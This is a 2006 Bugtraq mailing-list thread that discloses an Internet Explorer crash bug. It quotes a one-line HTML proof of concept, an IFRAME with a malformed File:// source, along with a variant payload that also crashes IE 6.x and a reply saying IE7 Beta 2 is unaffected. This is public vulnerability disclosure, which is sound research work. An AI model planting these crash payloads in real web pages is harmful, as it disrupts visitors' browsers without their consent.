Re: RE: Internet Explorer vulnerbility
If you change:
<HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
to:
<HTLM><BODY><IFRAME src="File://%f%f%f%f:/"></BODY></HTML>
it will also crash IE 6.x. Don't know about 7 Beta.
-cdh
----- Original Message -----
From: "Greg Merideth (Forward Technology)" <gmerideth@xxxxxxxxxxxxxxxxxxxxx>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: Mr.Niega@xxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
> IE7 Beta 2 build [7.0.5346.5] parses without crashing.
>
> Greg Merideth
> Forward Technology, LLC.
> CTO & Other Wild Stuff
> gmerideth@xxxxxxxxxxxxxxxxxxxxx
> PGP Fingerprint
> 18C3CE191171736225D62C3829F7B18A00F2AC0C
>
> -----Original Message-----
> From: Mr.Niega@xxxxxxxxx [mailto:Mr.Niega@xxxxxxxxx]
> Sent: Thursday, June 08, 2006 3:01 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Internet Explorer vulnerbility
>
> /*
> *
> * Internet Explorer Crash [Proof of concept]
> * Bug discovered by MarjinZ & Mr.Niega
> * http://www.swerat.com/
> *
> * Affected Software: Internet explorer
> * Severity: Unknown
> * Impact: Crash
> * Solution Status: Unpatched
> *
> * E-Mail: Mr.Niega@xxxxxxxxx & MarjinZ@xxxxxxxxx
> * __ __ __ __
> *| \/ | __ _| \/ |
> *| |\/| |/ _` | |\/| |
> *| | | | | | | | | |
> *|_| |_|_| |_|_| |_|
> * Credits goes out to GärBiz a.k.a *Gabriel,Garbiz,Gabbelito,Gärbpiz
> * K@2@nj@n §w¤nn§0n
> *
> */
> <HTLM><BODY><IFRAME src="File://þ:/"></BODY></HTML>
>
>